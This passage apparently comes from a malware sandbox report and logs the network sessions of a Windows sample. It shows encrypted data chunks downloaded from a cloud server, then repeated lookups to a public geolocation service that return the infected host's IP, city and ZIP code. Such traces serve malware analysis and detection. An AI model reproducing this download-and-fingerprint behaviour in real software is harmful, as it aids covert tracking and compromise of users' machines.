2025 22:59:49 GMT Date: Fri, 07 Mar 2025 22:01:12 GMT Expires: Fri, 07 Mar 2025 22:01:12 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=omCZsA== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-03-07 22:01:12 UTC	5014	IN	Data Raw: 96 4b 33 cc 44 db 46 fc 55 c1 91 88 ed b3 66 61 33 3c 10 97 5e cd 24 70 d3 00 a5 f0 c6 da eb 7f dd 79 30 a7 92 5e af 91 a5 26 97 31 40 17 f2 db a9 4f 45 89 de 92 ee f0 09 48 70 64 c1 b3 ef 38 b1 38 b8 3f 71 6b e2 dd 60 9d fd 7c 0c 39 10 31 6a bc 98 1d cd 25 8d 82 0e d9 5e 0d fd 6d 9d 1a 8d c6 6b e6 99 12 ef dc d5 fd d6 33 49 55 0b 9b 21 05 bc 6a 9f 3e b3 ec b7 6c 8e 90 b8 3e b9 ae 90 c4 93 06 96 3b a1 c8 c7 2e 52 96 1d 6d 3c 36 8a 67 eb fb 8f 30 fc 96 8b e5 3b 55 4c 3f 96 a3 89 f3 ca 22 16 ce b7 04 5d 4c 02 23 3f b8 ec b1 04 22 14 cb a0 0c 58 c1 7c 48 d7 21 d4 65 52 ad f2 a5 c4 31 c9 ca 26 a3 3b ed ed 2c ee 57 1d 29 ee ee 65 53 33 ab 94 d1 15 6f 00 d8 82 74 33 4d 98 ce e3 fb b7 64 c5 b6 82 5b d3 ba 03 e6 32 8a 18 2b fe 9c bd 85 04 a0 19 99 d9 d8 22 36 69 Data Ascii: K3DFUfa3<^$py0^&1@OEHpd88?qk`\|91j%^mk3IU!j>l>;.Rm<6g0;UL?"]L#?"X\|H!eR1&;,W)eS3ot3Md[2+"6i
2025-03-07 22:01:13 UTC	4668	IN	Data Raw: ae e8 8d 35 6d a4 d7 c2 27 1f fa 00 37 ac 7f e4 15 36 0e 67 d1 ab 73 f2 bd a8 27 98 13 5d 03 79 69 0b bb e5 a5 a7 64 dc 37 c7 7d f1 c5 a1 ea 2c 50 05 9a 51 35 ce 41 5f 5a 51 39 89 c7 a8 ac 12 cf e2 7c fd fb fa 07 c6 2b 33 84 f0 af 47 4a 93 27 29 2c 74 9b 18 0f c2 ac c4 0d 2a e0 79 7f c7 40 3f 41 e4 21 89 84 a6 87 c7 a8 f2 98 f0 c3 6e e9 f3 04 25 68 ca 69 d6 1b ce 8a b9 53 95 78 fc 02 02 b5 69 48 df 14 2e ea 68 66 5c 62 01 e9 23 61 fe a8 a9 a3 09 97 b8 a7 4c c3 8c d3 ed 58 05 b8 a6 0a b4 cc 36 aa 77 32 a8 c7 e6 a3 80 4a c0 3c 93 e9 d3 7c 7b d8 5d d5 0e 5b 39 5f 1e c4 a1 05 7f 7c f2 67 ec 39 5c b8 f0 bb 3b 38 c2 10 19 df 4d 2d 6d ce 5e f8 5b 5a 7f 82 f8 b8 8a cf 12 71 20 72 65 98 e7 cc 33 58 89 b8 a4 6e d4 9b 16 fa 33 97 ff cc 4d cf 05 04 29 95 85 eb f2 ee Data Ascii: 5m'76gs']yid7},PQ5A_ZQ9\|+3GJ'),t*y@?A!n%hiSxiH.hf\b#aLX6w2J<\|{][9_\|g9\;8M-m^[Zq re3Xn3M)
2025-03-07 22:01:13 UTC	1378	IN	Data Raw: d2 0c 45 c8 ed 6b 84 60 45 8e 46 79 de cf 8c cf f3 77 8e 51 1f 0b ae 35 b2 98 46 4f 1d af de d9 a5 05 14 71 c7 dc 28 9f 61 67 f5 d4 80 ff 4d 6e 26 ef 6e bb 78 4a 9f 33 94 47 ea 37 2a aa 49 83 cf 9c d7 0a d5 b9 e4 7e 40 d9 36 66 a2 c0 ae 4f a2 29 f9 e1 ff 52 54 80 17 12 d4 04 87 21 d6 22 c5 5a 04 9e c7 e7 c6 fb 39 49 02 ca a2 4c 42 cd 4d af c1 8b 75 ab 3a 4b 52 5d 16 7f bd f5 44 71 4f dc 3c 37 bc 6d f7 06 ea c1 f5 a0 bc 42 91 11 b8 d6 03 49 bb cc 8d c3 6f 9c 72 30 4b 33 09 dc 27 98 f6 d2 fe ab e9 e8 24 12 70 1a a2 39 60 49 ad 54 8b 05 54 4a 8c 4f 2f 43 42 0b b7 eb 46 ca 42 31 39 79 c5 82 b9 08 6d 63 3b 4a 8b 66 91 3e 13 bd 44 2d 0d d3 32 9a fe 51 72 74 d7 18 6d 38 b5 76 16 f5 30 cf 8c e4 46 33 4a e1 c9 56 fd 81 4f 7f bc d1 8a 56 74 4c 1d 43 6b 42 aa d2 c7 Data Ascii: Ek`EFywQ5FOq(agMn&nxJ3G7*I~@6fO)RT!"Z9ILBMu:KR]DqO<7mBIor0K3'$p9`ITTJO/CBFB19ymc;Jf>D-2Qrtm8v0F3JVOVtLCkB
2025-03-07 22:01:13 UTC	1378	IN	Data Raw: 49 7e fb 6f b4 80 52 86 41 d0 b2 75 4f 2c 35 eb 5e 6c e1 48 3f 7f 8a a4 06 58 b7 71 c7 08 2b 6b cc 96 84 4b db 9e a0 ea 51 eb 7f f4 35 e5 8a 97 c4 5a 98 67 ab a9 7a d5 ca 84 a4 64 3e 12 81 49 dd c7 1b 6f 93 ea c1 6a ca 6d 92 38 4f 96 d0 15 27 a7 f0 cc c1 f7 7a be 00 bb 73 7f e9 8d b8 47 13 59 aa 35 4b 51 48 3b fa bb 46 4e 93 6f 1a 28 54 ad 4d 50 97 8f 2b 69 ff cb f6 b5 d1 be 4c 5d 97 44 74 a2 dd 46 9e f0 17 c4 ff 1c 4c ba 9b 23 a6 44 0e 7e bd 9d 3b 5e ec c3 4a b5 bb e2 19 13 d5 e7 6f 68 38 8c 90 c6 f1 6d 4d 2d 02 54 96 73 21 33 d1 93 ab b7 ee 71 28 4f 5a 22 e2 dd 6e 91 fd 74 db 1c 10 31 d8 b1 91 24 1e 25 8d 82 66 dd 5e 0d fb 02 4a 1a 8d cc 04 3e 99 12 e5 b3 0c fd d6 39 3b 79 18 9b 51 03 bb 42 4f 3e b3 e6 37 47 8e 90 3c 16 bd ae 9e dd 46 d3 96 8f a2 6a 3a Data Ascii: I~oRAuO,5^lH?Xq+kKQ5Zgzd>Iojm8O'zsGY5KQH;FNo(TMP+iL]DtFL#D~;^Joh8mM-Ts!3q(OZ"nt1$%f^J>9;yQBO>7G<Fj:
2025-03-07 22:01:13 UTC	1378	IN	Data Raw: c5 2a 1a 96 a9 0e b3 82 9d c4 85 3a b2 88 d5 26 7d d1 7c db a1 d5 d6 0c 16 8e 78 75 ae e8 c2 26 7c b4 dc 80 64 0e 4b 70 58 7e 6c e4 1f 27 1f 77 e8 d9 fd 9b dd cc f3 b0 49 57 03 62 7a 0b 33 e5 a5 a7 18 aa 26 d5 66 e0 d4 af eb 2f 66 6a c4 50 5a a1 41 4e 42 3e 9a 8e a8 c4 ac 03 d5 8a c6 9a fb f0 1e ba 52 20 eb 83 a3 47 33 e9 35 38 34 14 3c 18 1e cc b7 c7 6f 54 8f 02 75 d4 4f 2c 45 f0 46 8d 21 a6 8d de ae f2 8c 9d 08 02 e9 f9 0e 34 a5 ab bf c7 1d e8 82 a8 6d 33 79 fc 02 08 b5 a3 71 ad 7b 43 e0 68 4c 51 b0 0f e9 1a 13 d2 a0 b2 a6 7a 1b f8 a7 46 c2 75 1b 91 c5 1f bc fa 2a e4 c8 59 ad d5 17 b5 b9 7f aa a8 20 62 19 81 91 89 61 7b af 59 92 09 34 3e fd 3b d7 df 9f 79 56 f6 c5 c9 22 1a 08 e1 b9 4b c3 e7 00 60 52 03 2d 6d cf 7b ec 29 27 6f af f4 1a a1 d8 3a df 20 70 Data Ascii: :&}\|xu&\|dKpX~l'wIWbz3&f/fjPZANB>R G3584<oTuO,EF!4m3yq{ChLQzFuY ba{Y4>;yV"K`R-m{)'o: p
2025-03-07 22:01:13 UTC	1378	IN	Data Raw: ac f3 dc f2 13 44 eb 97 59 79 36 25 e7 80 69 b6 10 94 dc de 97 9a e0 5b 33 55 40 42 81 e4 08 a4 c2 49 76 a7 25 a2 32 c1 fc 06 7f 9e 4b 1d da 4e 95 d9 14 89 62 69 43 a5 7a bd 79 3d 07 61 50 b6 f9 5f 6c 34 67 6d 1f 21 c5 a9 00 e3 a9 77 be 39 bc 9b 28 f8 54 9c df 4e a9 58 95 98 dc 7f e3 f1 d9 8c 4c b4 2f c1 bc c4 58 d1 66 40 e3 2c 4e dd ce e2 3c 33 84 1d 87 84 08 58 f6 ee fb da 32 14 76 78 13 8e 38 f9 81 61 66 76 84 9b 68 b5 d5 33 02 22 5f 90 8a 47 79 3f 2c 74 e6 fb f2 f3 51 ee 9d 54 63 75 6f 14 65 df 91 fc dd 10 26 27 32 a4 66 51 c4 11 0e 78 26 84 05 63 82 14 f9 68 c5 fe 4b 94 01 2a b9 f2 48 63 5c 62 0f 4c 0f f9 ab b7 e1 df c6 45 c1 e6 66 cb 34 7e 2d 8a 41 28 a2 1e 1e 78 93 10 6b 4f 29 8f 5b c8 f8 97 c5 42 7e 78 3b 54 8c cf 0f 53 07 9e f1 e6 56 e3 74 05 d1 Data Ascii: DYy6%i[3U@BIv%2KNbiCzy=aP_l4gm!w9(TNXL/Xf@,N<3X2vx8afvh3"_Gy?,tQTcuoe&'2fQx&chK*Hc\bLEf4~-A(xkO)[B~x;TSVt
2025-03-07 22:01:13 UTC	1378	IN	Data Raw: 98 d2 c4 8d e1 a8 24 33 ee 9c a5 d1 d1 ca e7 5b 2a 2c 35 c8 de aa 17 72 9e 9e 1e 1a 87 ee 26 04 f9 49 64 f3 66 c4 97 89 ff 3c cd fc 08 73 97 f3 51 ab ee fb 79 31 e9 7e 86 52 bc bc c7 ee 08 d1 f6 96 26 ae f4 0f 64 ec d0 4d 81 3c 9c ea 0c 4f cc 4f 65 95 12 6f 84 50 66 b9 e7 f9 c5 f3 7d 8c 7a 77 1d d8 35 b6 ba 80 6f 1d a9 b1 1e 8d 72 1e 71 dc d5 56 db 5e 67 f1 ae aa de 3f 9a 41 58 1e c5 6d 25 57 37 bc 04 ea 26 29 aa 63 92 46 9c d7 04 fd 96 ec 11 8c d9 e8 7c 87 36 8a 6a 8a 17 ea c2 f5 69 3d 80 3f 7a 0a 04 8d ff d6 5c f2 5a 7a b4 b5 b0 c0 89 39 4f 2a 09 b4 64 fb db b3 a4 c4 51 65 9c 1a 3b 43 e9 0e 7e bd f4 61 73 c3 d0 14 37 cc c9 a1 aa c2 6f ff 88 0a e0 b4 03 ca 83 b1 49 cb 64 bb d7 00 a9 0c 0a 4f 91 28 b5 eb d2 f9 d8 e1 b6 cc f3 50 0e 61 17 c9 96 89 49 a7 20 Data Ascii: $3[,5r&Idf<sQy1~R&dM<OOeoPf}zw5orqV^g?AXm%W7&)cF\|6ji=?z\Zz9OdQe;C~as7oIdO(PaI
2025-03-07 22:01:13 UTC	1378	IN	Data Raw: 49 37 f4 8d 32 c0 ad 03 31 ee 1a 29 c8 5c 40 13 0b 69 9b 4d 83 b7 88 88 d9 68 6b 47 62 ee e2 70 58 f0 dc 91 3b bd 0b e3 b5 a0 81 0d 27 f8 62 bf 36 a9 79 c3 fd 71 37 b5 00 e5 ff a2 13 1e bd dc af ab 2b 10 7e 87 04 4a 57 6f 3e c1 18 59 11 32 6f 91 8b 52 97 48 bf 78 75 4f 26 35 35 4e 49 c9 7c b6 7f 80 b7 a0 58 9f 13 f2 09 21 b5 df 96 84 4b e0 b0 a0 eb 55 99 0f e4 b6 94 9c bf 69 5b 98 6d 1c 55 7b c6 d1 95 af 5d 24 13 81 48 dd b4 a6 6f 43 e2 d2 66 9d 60 ec 02 59 92 d4 66 89 a7 f0 c6 eb 48 7a bf 0a bb 62 73 f9 48 b8 47 a9 27 97 35 64 53 27 fa ea bb 4c 4e c7 63 68 1b 44 ad 3d 78 cc 89 2b 63 ab 83 e6 b5 ba 91 17 5d 87 4e 1b 60 98 46 94 f1 1d f8 89 c8 8b bb eb 0b 28 44 0e 65 cf e3 db 4c 9c 9b 1b c7 b3 fb 76 a0 de cf 61 68 10 f9 ff 11 f7 7e 4a 6a ae 54 96 7f 5d e4 Data Ascii: I721)\@iMhkGbpX;'b6yq7+~JWo>Y2oRHxuO&55NI\|X!KUi[mU{]$HoCf`YfHzbsHG'5dS'LNchD=x+c]N`F(DeLvah~JjT]
2025-03-07 22:01:13 UTC	1378	IN	Data Raw: 7f 34 e6 19 28 e3 48 7b d6 ff 06 79 35 e1 88 f7 03 05 f0 8c 89 38 4a 8f 15 80 93 11 65 5f 28 ef b4 27 77 33 1f 3c 97 fb cc 3f ca 08 5f 20 fd e8 b8 f6 b6 bc 8b 16 c2 32 53 31 c8 79 6d be 74 c5 2e cf 80 d8 dd 89 54 2e df d8 f3 0e 04 93 3a 1a 9c ba 5b a2 92 ee a9 82 3a c2 56 06 26 7d 96 7d f3 fb 2b d5 06 07 91 17 29 ae ad c8 35 6c a5 cc f2 24 78 4e 00 37 1c 6c e4 15 30 08 67 f9 d8 73 f2 b7 e6 20 b0 48 5d 03 73 6a b9 e1 e5 a5 8b 0b b8 37 c4 70 f1 c2 ae fa a1 0f 40 9a 50 5b b0 71 56 50 ce 39 8e a8 ea ac 12 d4 e5 6d a9 fb fa 09 db 14 31 84 8a b5 6f 8a fa 27 23 30 99 9e 12 18 ff b4 d2 7e 40 f4 a9 20 d4 45 3e 78 cc 52 e2 8e d4 67 db ae 93 89 7f af 02 e9 f2 2b 33 c8 80 69 c7 19 ca 86 a8 55 fc 16 48 02 08 bf c7 03 cd 7b 33 c2 33 6c 51 b6 71 a2 32 64 d6 88 f2 a6 66 Data Ascii: 4(H{y58Je_('w3<?_ 2S1ymt.T.:[:V&}}+)5l$xN7l0gs H]sj7p@P[qVP9m1o'#0~@ E>xRg+3iUH{33lQq2df
2025-03-07 22:01:13 UTC	1378	IN	Data Raw: c7 8d 73 07 bf 5f e3 45 77 9e f5 c9 7a 55 66 1d 8c 08 a5 c6 33 55 7f e6 21 92 aa 52 2f dc 0c 72 79 f7 0d b3 b9 27 28 00 4d 2d 4b cb db 68 4e 4b e8 bc 82 37 3c 27 4d 97 db 48 13 d4 73 2c 04 36 07 1e d4 9e be b0 0e 49 46 ba 31 e8 ef a2 f3 c7 f6 2e 55 eb 89 b8 11 5c 4a 3e 80 b5 62 03 a0 ed 85 43 9a ea 42 25 4e 79 3b 90 fe 14 68 bf c1 1f c8 7b a2 32 b5 ce 17 64 f5 9d 4a d8 44 e5 de 25 55 b7 69 49 b9 97 a0 7b 27 79 1e 69 0b f1 4c 77 5b 53 1e bc 25 b7 92 11 fe c8 7c f9 f1 bc 9b 28 fd b4 8c d1 26 1d 5f ac ad dd 6e f8 9e 69 72 4a 83 2f d0 a6 d8 35 d1 66 40 cb 90 76 1e c4 e2 4f 8e 84 0b a5 e1 00 49 f4 90 e1 da 3e 10 05 ee 64 8e 32 9c 3e 7d eb 3c 84 8a 61 ff 03 41 9f 23 21 dd a2 06 7d 50 eb d6 c3 e6 8c a7 59 9c ab e6 46 1d 35 3e 74 df eb a6 d5 00 26 51 b8 da 7f 2f Data Ascii: s_EwzUf3U!R/ry'(M-KhNK7<'MHs,6IF1.U\J>bCB%Ny;h{2dJD%UiI{'yiLw[S%\|(&_nirJ/5f@vOI>d2>}<aA#!}PYF5>t&Q/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49691	104.21.80.1	443	2760	C:\Users\user\Desktop\BtCQu5APhK.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-07 22:01:17 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-03-07 22:01:18 UTC	852	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 22:01:17 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 470613 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Sun, 02 Mar 2025 11:17:44 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vHLDvkdb8FTNxSTTsua5UsMY2XB6KLYZvVZaOf%2F3rR8HpTVIWKpCSGDWl7KjlVYBYLqbdgJR2%2FwoU57jkoH0FtfRwVDNvUF5JRdLzzluNgrTCopJPdFNSsSptaWNd2PuP5mw5gEe"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91cd5edeffaef25f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=9559&min_rtt=8210&rtt_var=3518&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=352482&cwnd=235&unsent_bytes=0&cid=beeb5803521e3416&ts=601&x=0"
2025-03-07 22:01:18 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49692	104.21.80.1	443	2760	C:\Users\user\Desktop\BtCQu5APhK.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-07 22:01:20 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-03-07 22:01:20 UTC	861	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 22:01:20 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 48112 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 07 Mar 2025 08:39:27 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5GROhBEexm%2BgkJAXnbfcG%2BzQxYjFuvMTzqsbK34U73%2FOhKnCmlr6i2P8cMA5bFc98mvrL5dr%2BjfnlAgjG%2FVubPEtuL3jTm5tLw496WHrUeotE7w%2FLjkPi%2FGZTQpqDcAOWOt4EkeA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91cd5eeddb1c421c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=9023&min_rtt=6454&rtt_var=4120&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=448227&cwnd=251&unsent_bytes=0&cid=24d750c0b7a00164&ts=576&x=0"
2025-03-07 22:01:20 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49694	104.21.80.1	443	2760	C:\Users\user\Desktop\BtCQu5APhK.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-07 22:01:22 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-03-07 22:01:23 UTC	857	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 22:01:23 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 470618 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Sun, 02 Mar 2025 11:17:44 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zF2saU5C3b3pP6eCS2od6CaLtOe%2BhKw7%2FRW58gZvpY5O5AlVICiP3ouH4%2B5CMbHZEGsLcmyi8UeZXAbkgTc1WExB9jW5QquZOxKcr7fPOTAhAfz%2BLCjvaUPArZ5abPVr59rTzsJK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91cd5f0029eef25f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=18545&min_rtt=9885&rtt_var=17804&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4250&recv_bytes=699&delivery_rate=62004&cwnd=235&unsent_bytes=0&cid=dbaa2b8aa550d9b3&ts=727&x=0"
2025-03-07 22:01:23 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49696	104.21.80.1	443	2760	C:\Users\user\Desktop\BtCQu5APhK.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-07 22:01:25 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-03-07 22:01:26 UTC	855	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 22:01:26 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cf-Ray: 91cd5f1208ea0cc2-EWR Server: cloudflare Age: 48118 Cache-Control: max-age=31536000 Cf-Cache-Status: HIT Last-Modified: Fri, 07 Mar 2025 08:39:27 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3mbJUPC%2F47nRGDJ%2FDIlQwW3LzsmsYprxz7yakwbYrbSM2qhCPUQCtF9puPFLX8uE6Sg4VArOFgviI3QJISwTE6ONts72i%2B7Ggxz2kIXq38W9qwTiMhOIzKQcsodl%2BaTjBVK9Wa2S"}],"group":"cf-nel","max_age":604800} Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=9203&min_rtt=7235&rtt_var=3799&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=399834&cwnd=240&unsent_bytes=0&cid=bbc2244e3838c20a&ts=620&x=0"
2025-03-07 22:01:26 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49698	104.21.80.1	443	2760	C:\Users\user\Desktop\BtCQu5APhK.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-07 22:01:30 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-03-07 22:01:31 UTC	860	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 22:01:31 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 48123 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 07 Mar 2025 08:39:27 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oyXI6RBzT%2FxEMnon%2BRI4k0UvCK4lKyGZBVjy%2FXWaaezj%2B0xQfp7%2Fgs8ogRzYB5EnSfaazqYhQC7W8yJTe8dWuMZuIhqSLU2ev46GaGhCZ00f2mtIRUaW4zStaaLcJySXGHSq5hJZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91cd5f31a9eb421c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=77249&min_rtt=8428&rtt_var=51312&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=343372&cwnd=251&unsent_bytes=0&cid=519759c044e4028c&ts=2690&x=0"
